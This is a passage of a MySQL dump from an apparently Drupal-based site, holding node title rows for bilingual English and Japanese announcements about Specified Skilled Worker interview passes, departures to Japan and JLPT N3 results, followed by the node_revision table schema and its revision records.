(173, 648, 'ja', 1, 1, '特定技能（外食業）人材9名 新たなキャリアへの出発', 1781865746, 1781865800, 0, 0, 0, 1, 'en', 0),
(174, 649, 'en', 1, 1, 'A New Opportunity Begins in Japan\'s Food Service Industry', 1781865879, 1781866082, 0, 0, 1, 1, 'und', 0),
(174, 650, 'en', 1, 1, 'A New Opportunity Begins in Japan\'s Food Service Industry', 1781865879, 1781866082, 0, 0, 1, NULL, 'und', 0),
(174, 650, 'ja', 1, 1, '特定技能（外食業）人材 日本での新たなスタート', 1781866096, 1781866126, 0, 0, 0, 1, 'en', 0),
(175, 651, 'en', 1, 1, 'Starting a New Journey in Japan\'s Food Service Industry', 1781866201, 1781866452, 0, 0, 1, 1, 'und', 0),
(175, 652, 'en', 1, 1, 'Starting a New Journey in Japan\'s Food Service Industry', 1781866201, 1781866452, 0, 0, 1, NULL, 'und', 0),
(175, 652, 'ja', 1, 1, '特定技能（外食業）人材 日本での新たな挑戦', 1781866462, 1781866535, 0, 0, 0, 1, 'en', 0),
(176, 653, 'en', 1, 1, 'Two Food Service Workers Set Off for Japan', 1781866742, 1781866853, 0, 0, 1, 1, 'und', 0),
(176, 654, 'en', 1, 1, 'Two Food Service Workers Set Off for Japan', 1781866742, 1781866853, 0, 0, 1, NULL, 'und', 0),
(176, 654, 'ja', 1, 1, '特定技能（外食業）人材2名 日本出発のお知らせ', 1781867329, 1781867363, 0, 0, 0, 1, 'en', 0),
(177, 655, 'en', 1, 1, 'Food Service Worker Begins a New Chapter in Japan', 1781867430, 1781867563, 0, 0, 1, 1, 'und', 0),
(177, 656, 'en', 1, 1, 'Food Service Worker Begins a New Chapter in Japan', 1781867430, 1781867563, 0, 0, 1, NULL, 'und', 0),
(177, 656, 'ja', 1, 1, '特定技能（外食業）人材 日本での新たな一歩', 1781867579, 1781867606, 0, 0, 0, 1, 'en', 0),
(161, 657, 'en', 1, 1, 'Candidate Successfully Passed Tokutei Food Service Interview', 1781857982, 1781868026, 0, 0, 0, 1, 'ja', 0),
(161, 657, 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781857871, 1781857975, 0, 0, 1, 1, 'und', 0),
(161, 658, 'en', 1, 1, 'Candidate Successfully Passed Tokutei Food Service Interview', 1781857982, 1781868026, 0, 0, 0, NULL, 'ja', 0),
(161, 658, 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781857871, 1781868044, 0, 0, 1, NULL, 'und', 0),
(161, 659, 'en', 1, 1, 'Candidate Successfully Passed Tokutei Food Service Interview', 1781857982, 1781868082, 0, 0, 0, NULL, 'ja', 0),
(161, 659, 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781857871, 1781868044, 0, 0, 1, NULL, 'und', 0),
(160, 660, 'en', 1, 1, 'Candidate Successfully Passed Tokutei Food Service Interview', 1781857702, 1781868119, 0, 0, 1, 1, 'und', 0),
(160, 660, 'ja', 1, 1, '特定技能（外食業）面接合格のご報告', 1781857818, 1781857849, 0, 0, 0, 1, 'en', 0),
(178, 661, 'en', 1, 1, 'A Successful Step Toward a Caregiving Career in Japan', 1781868157, 1781868217, 0, 0, 1, 1, 'und', 0),
(178, 662, 'en', 1, 1, 'A Successful Step Toward a Caregiving Career in Japan', 1781868157, 1781868217, 0, 0, 1, NULL, 'und', 0),
(178, 662, 'ja', 1, 1, '特定技能（介護）面接合格のお知らせ', 1781869786, 1781869820, 0, 0, 0, 1, 'en', 0),
(179, 663, 'en', 1, 1, 'Successful Food Service Interview Result', 1781869947, 1781870011, 0, 0, 1, 1, 'und', 0),
(179, 664, 'en', 1, 1, 'Successful Food Service Interview Result', 1781869947, 1781870011, 0, 0, 1, NULL, 'und', 0),
(179, 664, 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781870019, 1781870056, 0, 0, 0, 1, 'en', 0),
(180, 665, 'ja', 1, 1, 'Food Service Candidate Achieves Interview Success', 1781870098, 1781870184, 0, 0, 1, 1, 'und', 0),
(180, 666, 'en', 1, 1, 'Food Service Candidate Achieves Interview Success', 1781870098, 1781870198, 0, 0, 1, 1, 'und', 0),
(180, 667, 'en', 1, 1, 'Food Service Candidate Achieves Interview Success', 1781870098, 1781870198, 0, 0, 1, NULL, 'und', 0),
(180, 667, 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781870203, 1781870229, 0, 0, 0, 1, 'en', 0),
(181, 668, 'en', 1, 1, 'Student Successfully Passed JLPT N3 Examination', 1781870291, 1781870377, 0, 0, 1, 1, 'und', 0),
(181, 669, 'en', 1, 1, 'Student Successfully Passed JLPT N3 Examination', 1781870291, 1781870377, 0, 0, 1, NULL, 'und', 0),
(181, 669, 'ja', 1, 1, 'JLPT N3合格のお知らせ', 1781870453, 1781870480, 0, 0, 0, 1, 'en', 0),
(182, 670, 'en', 1, 1, 'From N5 to N3: A Successful Learning Journey', 1781870511, 1781870596, 0, 0, 1, 1, 'und', 0),
(182, 671, 'en', 1, 1, 'From N5 to N3: A Successful Learning Journey', 1781870511, 1781870596, 0, 0, 1, NULL, 'und', 0),
(182, 671, 'ja', 1, 1, 'N5からN3へ ― 学習成果のご報告', 1781870603, 1781870629, 0, 0, 0, 1, 'en', 0),
(183, 672, 'en', 1, 1, 'JLPT N3 Success Opens New Opportunities', 1781870655, 1781870746, 0, 0, 1, 1, 'und', 0),
(183, 673, 'en', 1, 1, 'JLPT N3 Success Opens New Opportunities', 1781870655, 1781870746, 0, 0, 1, NULL, 'und', 0),
(183, 673, 'ja', 1, 1, 'JLPT N3合格により広がる新たな可能性', 1781870753, 1781870783, 0, 0, 0, 1, 'en', 0),
(184, 674, 'en', 1, 1, 'Two Food Service Workers Depart for Japan After Months of Preparation', 1781870885, 1781871015, 0, 0, 1, 1, 'und', 0),
(184, 675, 'en', 1, 1, 'Two Food Service Workers Depart for Japan After Months of Preparation', 1781870885, 1781871015, 0, 0, 1, NULL, 'und', 0),
(184, 675, 'ja', 1, 1, '特定技能（外食業）人材2名 日本出発のお知らせ', 1781871026, 1781871059, 0, 0, 0, 1, 'en', 0),
(185, 676, 'en', 1, 1, 'ood Service Candidate Successfully Advances to the Next Stage', 1781871092, 1781871245, 0, 0, 1, 1, 'und', 0),
(185, 677, 'en', 1, 1, 'Food Service Candidate Successfully Advances to the Next Stage', 1781871092, 1781871263, 0, 0, 1, 1, 'und', 0),
(185, 678, 'en', 1, 1, 'Food Service Candidate Successfully Advances to the Next Stage', 1781871092, 1781871263, 0, 0, 1, NULL, 'und', 0),
(185, 678, 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781871269, 1781871303, 0, 0, 0, 1, 'en', 0),
(186, 679, 'en', 1, 1, 'Food Service Candidate Demonstrates Readiness for a Career in Japan', 1781871381, 1781871431, 0, 0, 1, 1, 'und', 0),
(186, 680, 'en', 1, 1, 'Food Service Candidate Demonstrates Readiness for a Career in Japan', 1781871381, 1781871431, 0, 0, 1, NULL, 'und', 0),
(186, 680, 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781871439, 1781871464, 0, 0, 0, 1, 'en', 0),
(187, 681, 'en', 1, 1, 'A Promising Future Begins with Interview Success', 1781927778, 1781927919, 0, 0, 1, 1, 'und', 0),
(187, 682, 'en', 1, 1, 'A Promising Future Begins with Interview Success', 1781927778, 1781927919, 0, 0, 1, NULL, 'und', 0),
(187, 682, 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781927928, 1781927973, 0, 0, 0, 1, 'en', 0),
(188, 683, 'en', 1, 1, 'Successful Interview Result for a Future Caregiver in Japan', 1781929358, 1781929622, 0, 0, 1, 1, 'und', 0),
(188, 684, 'en', 1, 1, 'Successful Interview Result for a Future Caregiver in Japan', 1781929358, 1781929622, 0, 0, 1, NULL, 'und', 0),
(188, 684, 'ja', 1, 1, '特定技能（介護）面接合格のお知らせ', 1781929630, 1781929703, 0, 0, 0, 1, 'en', 0),
(189, 685, 'en', 1, 1, 'Commitment and Dedication Lead to Interview Success', 1781929873, 1781930057, 0, 0, 1, 1, 'und', 0),
(189, 686, 'en', 1, 1, 'Commitment and Dedication Lead to Interview Success', 1781929873, 1781930057, 0, 0, 1, NULL, 'und', 0),
(189, 686, 'ja', 1, 1, '特定技能（介護）面接合格のお知らせ', 1781931645, 1781931678, 0, 0, 0, 1, 'en', 0),
(190, 687, 'en', 1, 1, 'Preparation and Determination Lead to Interview Success', 1781931692, 1781932120, 0, 0, 1, 1, 'und', 0),
(190, 688, 'en', 1, 1, 'Preparation and Determination Lead to Interview Success', 1781931692, 1781932120, 0, 0, 1, NULL, 'und', 0),
(190, 688, 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781932145, 1781932181, 0, 0, 0, 1, 'en', 0),
(190, 689, 'en', 1, 1, 'Preparation and Determination Lead to Interview Success', 1781931692, 1781932260, 0, 0, 1, 1, 'und', 0),
(190, 689, 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781932145, 1781932181, 0, 0, 0, NULL, 'en', 0),
(191, 690, 'en', 1, 1, 'Hard Work Recognized Through Interview Success', 1781932270, 1781932388, 0, 0, 1, 1, 'und', 0),
(191, 691, 'en', 1, 1, 'Hard Work Recognized Through Interview Success', 1781932270, 1781932388, 0, 0, 1, NULL, 'und', 0),
(191, 691, 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781932395, 1781932417, 0, 0, 0, 1, 'en', 0),
(192, 692, 'en', 1, 1, 'Persistence and Dedication Result in Interview Success', 1781932475, 1781932531, 0, 0, 1, 1, 'und', 0),
(192, 693, 'en', 1, 1, 'Persistence and Dedication Result in Interview Success', 1781932475, 1781932531, 0, 0, 1, NULL, 'und', 0),
(192, 693, 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781932582, 1781932608, 0, 0, 0, 1, 'en', 0),
(193, 694, 'en', 1, 1, 'Interview Success Marks the Beginning of New Opportunities', 1781932655, 1781932755, 0, 0, 1, 1, 'und', 0),
(193, 695, 'en', 1, 1, 'Interview Success Marks the Beginning of New Opportunities', 1781932655, 1781932755, 0, 0, 1, NULL, 'und', 0),
(193, 695, 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781932761, 1781932799, 0, 0, 0, 1, 'en', 0),
(193, 696, 'en', 1, 1, 'Interview Success Marks the Beginning of New Opportunities', 1781932655, 1781933525, 0, 0, 1, 1, 'und', 0),
(193, 696, 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781932761, 1781932799, 0, 0, 0, 1, 'en', 0),
(194, 697, 'en', 1, 1, 'Successful Interview Opens the Door to International Experience', 1781933649, 1781936787, 0, 0, 1, 1, 'und', 0),
(194, 698, 'en', 1, 1, 'Successful Interview Opens the Door to International Experience', 1781933649, 1781936787, 0, 0, 1, NULL, 'und', 0),
(194, 698, 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781936795, 1781936828, 0, 0, 0, 1, 'en', 0),
(195, 699, 'en', 1, 1, 'Building Skills and Opportunities Through Success', 1781937042, 1781937183, 0, 0, 1, 1, 'und', 0),
(195, 700, 'en', 1, 1, 'Building Skills and Opportunities Through Success', 1781937042, 1781937183, 0, 0, 1, NULL, 'und', 0),
(195, 700, 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781937192, 1781937232, 0, 0, 0, 1, 'en', 0),
(196, 701, 'en', 1, 1, 'Determination Leads to Interview Success', 1781937254, 1781937623, 0, 0, 1, 1, 'und', 0),
(196, 702, 'en', 1, 1, 'Determination Leads to Interview Success', 1781937254, 1781937623, 0, 0, 1, NULL, 'und', 0),
(196, 702, 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781937674, 1781937768, 0, 0, 0, 1, 'en', 0),
(197, 703, 'en', 1, 1, 'Interview Success Opens New Possibilities in Japan', 1781937800, 1781938112, 0, 0, 1, 1, 'und', 0),
(197, 704, 'en', 1, 1, 'Interview Success Opens New Possibilities in Japan', 1781937800, 1781938112, 0, 0, 1, NULL, 'und', 0),
(197, 704, 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781938122, 1781938160, 0, 0, 0, 1, 'en', 0),
(198, 705, 'en', 1, 1, 'A Significant Achievement Toward a Career in Japan', 1781938328, 1781938542, 0, 0, 1, 1, 'und', 0),
(198, 706, 'en', 1, 1, 'A Significant Achievement Toward a Career in Japan', 1781938328, 1781938542, 0, 0, 1, NULL, 'und', 0),
(198, 706, 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781938666, 1781938704, 0, 0, 0, 1, 'en', 0),
(199, 707, 'en', 1, 1, 'Turning Effort into Success: Interview Passed', 1781938732, 1781938836, 0, 0, 1, 1, 'und', 0),
(199, 708, 'en', 1, 1, 'Turning Effort into Success: Interview Passed', 1781938732, 1781938836, 0, 0, 1, NULL, 'und', 0),
(199, 708, 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781938842, 1781938891, 0, 0, 0, 1, 'en', 0),
(200, 709, 'en', 1, 1, 'Ready for the Next Challenge: Interview Successfully Passed', 1781938915, 1781939019, 0, 0, 1, 1, 'und', 0),
(200, 710, 'en', 1, 1, 'Ready for the Next Challenge: Interview Successfully Passed', 1781938915, 1781939019, 0, 0, 1, NULL, 'und', 0),
(200, 710, 'ja', 1, 1, '特定技能（外食業）面接合格のお知らせ', 1781939025, 1781939058, 0, 0, 0, 1, 'en', 0),
(204, 715, 'ja', 1, 2, 'Title 1', 1787750997, 1787751259, 0, 0, 1, 1, 'und', 0),
(204, 716, 'ja', 1, 2, 'Title 1', 1787750997, 1787751526, 0, 0, 1, 1, 'und', 0),
(205, 717, 'ja', 1, 2, 'Title 2', 1787752359, 1787752396, 0, 0, 1, 1, 'und', 0),
(205, 718, 'en', 1, 2, 'Title 2', 1787752645, 1787752649, 0, 0, 0, 1, 'ja', 0),
(205, 718, 'ja', 1, 2, 'Title 2', 1787752359, 1787752649, 0, 0, 1, NULL, 'und', 0),
(204, 719, 'en', 1, 2, 'Title 1', 1787752664, 1787752667, 0, 0, 0, 1, 'ja', 0),
(204, 719, 'ja', 1, 2, 'Title 1', 1787750997, 1787752667, 0, 0, 1, NULL, 'und', 0),
(204, 720, 'en', 1, 2, 'Title 1', 1787752664, 1787838595, 0, 0, 0, NULL, 'ja', 0),
(204, 720, 'ja', 1, 2, 'Title 1', 1787750997, 1787838595, 0, 0, 1, NULL, 'und', 0),
(205, 721, 'en', 1, 2, 'Title 2', 1787752645, 1787838627, 0, 0, 0, NULL, 'ja', 0),
(205, 721, 'ja', 1, 2, 'Title 2', 1787752359, 1787838627, 0, 0, 1, NULL, 'und', 0),
(206, 722, 'ja', 1, 2, 'Title 3', 1787838799, 1787838829, 0, 0, 1, 1, 'und', 0),
(206, 723, 'ja', 1, 2, 'Title 3', 1787838799, 1787923046, 0, 0, 1, 1, 'und', 0);

-- --------------------------------------------------------

--
-- Table structure for table `node_revision`
--

CREATE TABLE `node_revision` (
  `nid` int UNSIGNED NOT NULL,
  `vid` int UNSIGNED NOT NULL,
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `revision_uid` int UNSIGNED DEFAULT NULL COMMENT 'The ID of the target entity.',
  `revision_timestamp` int DEFAULT NULL,
  `revision_log` longtext,
  `revision_default` tinyint DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The revision table for node entities.';

--
-- Dumping data for table `node_revision`
--

INSERT INTO `node_revision` (`nid`, `vid`, `langcode`, `revision_uid`, `revision_timestamp`, `revision_log`, `revision_default`) VALUES
(1, 1, 'en', 1, 1687235804, NULL, 1),
(1, 2, 'en', 1, 1687236130, NULL, 1),
(3, 6, 'en', 1, 1687238173, NULL, 1),
(4, 7, 'en', 1, 1687238319, NULL, 1),
(4, 8, 'en', 1, 1687238357, NULL, 1),
(3, 9, 'en', 1, 1687238428, NULL, 1),
(5, 10, 'en', 1, 1687238503, NULL, 1),
(6, 11, 'en', 1, 1687240557, NULL, 1),
(7, 12, 'en', 1, 1687240947, NULL, 1),
(8, 13, 'en', 1, 1687241381, NULL, 1),
(9, 14, 'en', 1, 1687241885, NULL, 1),
(9, 15, 'en', 1, 1687242008, NULL, 1),
(10, 16, 'en', 1, 1687265901, NULL, 1),
(11, 17, 'en', 1, 1687305974, NULL, 1),
(11, 18, 'en', 1, 1687306034, NULL, 1),
(11, 19, 'en', 1, 1687306080, NULL, 1),
(11, 20, 'en', 1, 1687306114, NULL, 1),
(6, 21, 'en', 1, 1687311319, NULL, 1),
(5, 22, 'en', 1, 1687311438, NULL, 1),
(8, 23, 'en', 1, 1687311856, NULL, 1),
(6, 24, 'en', 1, 1687311876, NULL, 1),
(5, 25, 'en', 1, 1687312455, NULL, 1),
(5, 26, 'en', 1, 1687312526, NULL, 1),
(1, 27, 'en', 1, 1687405407, NULL, 1),
(5, 28, 'en', 1, 1687407416, NULL, 1),
(10, 29, 'en', 1, 1687407521, NULL, 1),
(4, 30, 'en', 1, 1687407693, NULL, 1),
(4, 31, 'en', 1, 1687407712, NULL, 1),
(4, 32, 'en', 1, 1687407765, NULL, 1),
(6, 33, 'en', 1, 1687408012, NULL, 1),
(9, 34, 'en', 1, 1687408077, NULL, 1),
(10, 35, 'en', 1, 1687408168, NULL, 1),
(10, 36, 'en', 1, 1687408217, NULL, 1),
(5, 37, 'en', 1, 1687408278, NULL, 1),
(3, 38, 'en', 1, 1687408504, NULL, 1),
(4, 39, 'en', 1, 1687418978, NULL, 1),
(4, 40, 'en', 1, 1687419568, NULL, 1),
(3, 41, 'en', 1, 1687421050, NULL, 1),
(5, 42, 'en', 1, 1687421298, NULL, 1),
(10, 43, 'en', 1, 1687421314, NULL, 1),
(9, 44, 'en', 1, 1687421347, NULL, 1),
(6, 45, 'en', 1, 1687421361, NULL, 1),
(7, 46, 'en', 1, 1687421814, NULL, 1),
(1, 47, 'en', 1, 1688183617, NULL, 1),
(1, 48, 'en', 1, 1688183685, NULL, 1),
(4, 49, 'en', 1, 1688183951, NULL, 1),
(1, 54, 'en', 1, 1688185230, NULL, 1),
(11, 55, 'en', 1, 1688185257, NULL, 1),
(17, 57, 'en', 1, 1688195344, NULL, 1),
(17, 58, 'en', 1, 1688195504, NULL, 1),
(18, 59, 'en', 1, 1688195992, NULL, 1),
(18, 60, 'en', 1, 1688196445, NULL, 1),
(18, 61, 'en', 1, 1688196549, NULL, 1),
(9, 62, 'en', 1, 1688199484, NULL, 1),
(11, 63, 'en', 1, 1688199790, NULL, 1),
(1, 64, 'en', 1, 1688200464, NULL, 1),
(19, 65, 'en', 1, 1688201010, NULL, 1),
(20, 66, 'en', 1, 1688204471, NULL, 1),
(1, 67, 'en', 1, 1688211096, NULL, 1),
(1, 68, 'en', 1, 1688353597, NULL, 1),
(1, 69, 'en', 1, 1688353960, NULL, 1),
(1, 70, 'en', 1, 1688360550, NULL, 1),
(18, 71, 'en', 1, 1688361046, NULL, 1),
(10, 72, 'en', 1, 1688361721, NULL, 1),
(18, 73, 'en', 1, 1688361941, NULL, 1),
(18, 74, 'en', 1, 1688362772, NULL, 1),
(4, 75, 'en', 1, 1688363483, NULL, 1),
(5, 76, 'en', 1, 1688364918, NULL, 1),
(5, 77, 'en', 1, 1688365050, NULL, 1),
(5, 78, 'en', 1, 1688365096, NULL, 1),
(11, 79, 'en', 2, 1688370916, NULL, 1),
(3, 80, 'en', 1, 1688376697, NULL, 1),
(3, 81, 'en', 1, 1688376793, NULL, 1),
(3, 82, 'en', 1, 1688376827, NULL, 1),
(1, 83, 'en', 1, 1688376966, NULL, 1),
(20, 84, 'en', 1, 1688377233, NULL, 1),
(19, 85, 'en', 1, 1688377651, NULL, 1),
(1, 86, 'en', 2, 1688382547, NULL, 1),
(1, 87, 'en', 2, 1688382686, NULL, 1),
(1, 88, 'en', 2, 1688382713, NULL, 1),
(11, 89, 'en', 2, 1688383134, NULL, 1),
(11, 90, 'en', 2, 1688383148, NULL, 1),
(21, 91, 'en', 2, 1688383668, NULL, 1),
(22, 92, 'en', 2, 1688383690, NULL, 1),
(23, 93, 'en', 2, 1688384170, NULL, 1),
(23, 94, 'en', 2, 1688384228, NULL, 1),
(23, 95, 'en', 2, 1688384247, NULL, 1),
(24, 96, 'en', 2, 1688384298, NULL, 1),
(24, 97, 'en', 2, 1688384315, NULL, 1),
(23, 98, 'en', 2, 1688384343, NULL, 1),
(25, 99, 'en', 2, 1688384384, NULL, 1),
(25, 100, 'en', 2, 1688384403, NULL, 1),
(25, 101, 'en', 2, 1688384462, NULL, 1),
(26, 102, 'en', 2, 1688384486, NULL, 1),
(26, 103, 'en', 2, 1688384515, NULL, 1),
(26, 104, 'en', 2, 1688384543, NULL, 1),
(27, 105, 'en', 2, 1688384574, NULL, 1),
(27, 106, 'en', 2, 1688384590, NULL, 1),
(27, 107, 'en', 2, 1688384605, NULL, 1),
(23, 108, 'en', 2, 1688384708, NULL, 1),
(23, 109, 'en', 2, 1688384717, NULL, 1),
(8, 110, 'en', 2, 1688388291, NULL, 1),
(8, 111, 'en', 2, 1688388301, NULL, 1),
(8, 112, 'en', 2, 1688388317, NULL, 1),
(8, 113, 'en', 2, 1688388390, NULL, 1),
(8, 114, 'en', 2, 1688388422, NULL, 1),
(6, 115, 'en', 2, 1688388648, NULL, 1),
(6, 116, 'en', 2, 1688388655, NULL, 1),
(7, 117, 'en', 2, 1688388678, NULL, 1),
(7, 118, 'en', 2, 1688388689, NULL, 1),
(17, 119, 'en', 2, 1688388704, NULL, 1),
(17, 120, 'en', 2, 1688388714, NULL, 1),
(9, 121, 'en', 2, 1688388733, NULL, 1),
(9, 122, 'en', 2, 1688388741, NULL, 1),
(20, 123, 'en', 2, 1688388756, NULL, 1),
(20, 124, 'en', 2, 1688388764, NULL, 1),
(19, 125, 'en', 2, 1688388773, NULL, 1),
(19, 126, 'en', 2, 1688388791, NULL, 1),
(10, 127, 'en', 2, 1688388903, NULL, 1),
(18, 128, 'en', 2, 1688388906, NULL, 1),
(10, 129, 'en', 2, 1688388916, NULL, 1),
(18, 130, 'en', 2, 1688388919, NULL, 1),
(4, 131, 'en', 2, 1688388945, NULL, 1),
(5, 132, 'en', 2, 1688388947, NULL, 1),
(3, 133, 'en', 2, 1688388949, NULL, 1),
(4, 134, 'en', 2, 1688388963, NULL, 1),
(5, 135, 'en', 2, 1688388965, NULL, 1),
(3, 136, 'en', 2, 1688388967, NULL, 1),
(24, 137, 'en', 2, 1688432705, NULL, 1),
(23, 138, 'en', 1, 1688458194, NULL, 1),
(24, 139, 'en', 1, 1688458321, NULL, 1),
(25, 140, 'en', 1, 1688458331, NULL, 1),
(24, 141, 'en', 1, 1688458367, NULL, 1),
(26, 142, 'en', 1, 1688458583, NULL, 1),
(23, 143, 'en', 1, 1688458648, NULL, 1),
(1, 144, 'en', 1, 1688458884, NULL, 1),
(1, 145, 'en', 1, 1688458973, NULL, 1),
(25, 146, 'en', 1, 1688459987, NULL, 1),
(1, 147, 'en', 1, 1688460034, NULL, 1),
(17, 148, 'en', 1, 1688546048, NULL, 1),
(17, 149, 'en', 1, 1688546090, NULL, 1),
(9, 150, 'en', 1, 1688546162, NULL, 1),
(6, 151, 'en', 1, 1688546491, NULL, 1),
(8, 152, 'en', 1, 1688546702, NULL, 1),
(7, 153, 'en', 1, 1688546973, NULL, 1),
(7, 154, 'en', 1, 1688547023, NULL, 1),
(1, 155, 'en', 1, 1688633594, NULL, 1),
(23, 156, 'en', 1, 1688633615, NULL, 1),
(23, 157, 'en', 1, 1688958287, NULL, 1),
(24, 158, 'en', 1, 1688958958, NULL, 1),
(27, 159, 'en', 1, 1689142571, NULL, 1),
(23, 160, 'en', 1, 1689329431, NULL, 1),
(1, 161, 'en', 1, 1689329551, NULL, 1),
(25, 162, 'en', 1, 1689329626, NULL, 1),
(26, 163, 'en', 1, 1689329687, NULL, 1),
(26, 164, 'en', 1, 1689329715, NULL, 1),
(23, 165, 'en', 1, 1689329824, NULL, 1),
(24, 166, 'en', 1, 1689391666, NULL, 1),
(25, 167, 'en', 1, 1689391732, NULL, 1),
(26, 168, 'en', 1, 1689391811, NULL, 1),
(26, 169, 'en', 1, 1689391844, NULL, 1),
(1, 170, 'en', 1, 1689413814, NULL, 1),
(23, 171, 'en', 1, 1689414271, NULL, 1),
(23, 172, 'en', 1, 1689414307, NULL, 1),
(25, 173, 'en', 1, 1689649528, NULL, 1),
(26, 174, 'en', 1, 1689649658, NULL, 1),
(27, 175, 'en', 1, 1689650226, NULL, 1),
(25, 176, 'en', 1, 1689650477, NULL, 1),
(26, 177, 'en', 1, 1689650519, NULL, 1),
(25, 178, 'en', 1, 1689650801, NULL, 1),
(26, 179, 'en', 1, 1689650824, NULL, 1),
(1, 180, 'en', 1, 1689650948, NULL, 1),
(1, 181, 'en', 1, 1689651180, NULL, 1),
(1, 182, 'en', 1, 1689652632, NULL, 1),
(24, 183, 'en', 1, 1689659557, NULL, 1),
(24, 184, 'en', 1, 1689659611, NULL, 1),
(20, 185, 'en', 1, 1689840443, NULL, 1),
(19, 186, 'en', 1, 1689841260, NULL, 1),
(9, 187, 'en', 1, 1689841547, NULL, 1),
(17, 188, 'en', 1, 1689841671, NULL, 1),
(23, 189, 'en', 1, 1689854470, NULL, 1),
(23, 190, 'en', 1, 1689854542, NULL, 1),
(23, 191, 'en', 1, 1689856127, NULL, 1),
(23, 192, 'en', 1, 1689856229, NULL, 1),
(23, 193, 'en', 1, 1689856323, NULL, 1),
(23, 194, 'en', 1, 1689856356, NULL, 1),
(24, 195, 'en', 1, 1689911684, NULL, 1),
(25, 196, 'en', 1, 1689911746, NULL, 1),
(26, 197, 'en', 1, 1689911802, NULL, 1),
(26, 198, 'en', 1, 1689911813, NULL, 1),
(27, 199, 'en', 1, 1689912074, NULL, 1),
(23, 200, 'en', 1, 1689912307, NULL, 1),
(24, 201, 'en', 1, 1689912364, NULL, 1),
(25, 202, 'en', 1, 1689912400, NULL, 1),
(26, 203, 'en', 1, 1689912432, NULL, 1),
(4, 204, 'en', 1, 1689913907, NULL, 1),
(1, 205, 'en', 1, 1689915842, NULL, 1),
(1, 206, 'en', 1, 1689915940, NULL, 1),
(18, 207, 'en', 1, 1689925879, NULL, 1),
(4, 208, 'en', 1, 1689927237, NULL, 1),
(4, 209, 'en', 1, 1689927282, NULL, 1),
(4, 210, 'en', 1, 1689927311, NULL, 1),
(10, 211, 'en', 1, 1689928131, NULL, 1),
(5, 212, 'en', 1, 1689928736, NULL, 1),
(3, 213, 'en', 1, 1689929077, NULL, 1),
(6, 214, 'en', 1, 1689929221, NULL, 1),
(8, 215, 'en', 1, 1689929372, NULL, 1),
(7, 216, 'en', 1, 1689929528, NULL, 1),
(28, 217, 'en', 1, 1689933728, NULL, 1),
(28, 218, 'en', 1, 1689933768, NULL, 1),
(28, 219, 'en', 1, 1689933982, NULL, 1),
(28, 220, 'en', 1, 1689934025, NULL, 1),
(29, 221, 'en', 1, 1689934449, NULL, 1),
(29, 222, 'en', 1, 1689934512, NULL, 1),
(29, 223, 'en', 1, 1689934558, NULL, 1),
(30, 224, 'en', 1, 1689935390, NULL, 1),
(30, 225, 'en', 1, 1689935437, NULL, 1),
(30, 226, 'en', 1, 1689935517, NULL, 1),
(27, 227, 'en', 1, 1690084031, NULL, 1),
(23, 228, 'en', 1, 1690084525, NULL, 1),
(26, 229, 'en', 1, 1690084805, NULL, 1),
(25, 230, 'en', 1, 1690084883, NULL, 1),
(24, 231, 'en', 1, 1690085236, NULL, 1),
(11, 232, 'en', 1, 1690085713, NULL, 1),
(26, 233, 'en', 1, 1690087634, NULL, 1),
(11, 234, 'en', 1, 1690088051, NULL, 1),
(11, 235, 'en', 1, 1690088294, NULL, 1),
(25, 236, 'en', 1, 1690258215, NULL, 1),
(25, 237, 'en', 1, 1690258270, NULL, 1),
(25, 238, 'en', 1, 1690258345, NULL, 1),
(25, 239, 'en', 1, 1690258379, NULL, 1),
(25, 240, 'en', 1, 1690258505, NULL, 1),
(27, 241, 'en', 1, 1690282556, NULL, 1),
(27, 242, 'en', 1, 1690282611, NULL, 1),
(27, 243, 'en', 1, 1690282650, NULL, 1),
(11, 244, 'en', 1, 1690339928, NULL, 1),
(11, 245, 'en', 1, 1690339970, NULL, 1),
(11, 246, 'en', 1, 1690339985, NULL, 1),
(11, 247, 'en', 1, 1690340000, NULL, 1),
(23, 248, 'en', 1, 1690340246, NULL, 1),
(24, 249, 'en', 1, 1690341799, NULL, 1),
(25, 250, 'en', 1, 1690342918, NULL, 1),
(26, 251, 'en', 1, 1690343116, NULL, 1),
(24, 252, 'en', 1, 1690343459, NULL, 1),
(24, 253, 'en', 1, 1690343563, NULL, 1),
(24, 254, 'en', 1, 1690343833, NULL, 1),
(27, 255, 'en', 1, 1690351069, NULL, 1),
(27, 256, 'en', 1, 1690351396, NULL, 1),
(31, 257, 'en', 1, 1690352771, NULL, 1),
(31, 258, 'en', 1, 1690352793, NULL, 1),
(31, 259, 'en', 1, 1690357358, NULL, 1),
(11, 260, 'en', 1, 1690447347, NULL, 1),
(11, 261, 'en', 1, 1690447452, NULL, 1),
(11, 262, 'en', 1, 1690447520, NULL, 1),
(23, 263, 'en', 1, 1690533094, NULL, 1),
(23, 264, 'en', 1, 1690537451, NULL, 1),
(23, 265, 'en', 1, 1690537991, NULL, 1),
(23, 266, 'en', 1, 1690538470, NULL, 1),
(23, 267, 'en', 1, 1690540427, NULL, 1),
(27, 268, 'en', 1, 1690541094, NULL, 1),
(23, 269, 'en', 1, 1690602399, NULL, 1),
(23, 270, 'en', 1, 1690602474, NULL, 1),
(23, 271, 'en', 1, 1690602548, NULL, 1),
(27, 272, 'en', 1, 1690604922, NULL, 1),
